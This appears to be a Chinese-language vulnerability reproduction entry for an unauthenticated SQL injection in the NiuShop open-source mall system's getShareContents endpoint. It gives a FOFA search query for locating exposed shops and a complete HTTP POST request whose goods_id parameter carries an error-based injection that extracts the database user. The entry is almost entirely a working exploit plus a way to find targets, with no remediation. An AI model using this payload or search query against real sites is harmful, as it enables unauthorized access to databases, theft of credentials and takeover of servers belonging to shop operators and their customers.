S12-1山西牛酷信息科技-NiuShop开源商城系统-SQL
漏洞描述:
NiuShop开源商城系统 getShareContents接口处存在SQL注入漏洞,未授权的攻击者可以利用此漏洞获取数据库敏感信息及凭证,进一步利用可获取服务器权限
网站图片:
网络测绘:
fofa语法:
body=“niushop_url_model” && body=“niushop_rewrite_model”
漏洞复现:
payload:
POST /index.php?s=/wap/goods/getShareContents/// HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
flag=goods&goods_id={{int(0-100|3)}}) AND GTID_SUBSET(CONCAT(0x7e,(SELECT (USER())),0x7e),1)--+&shop_id=0
效果图: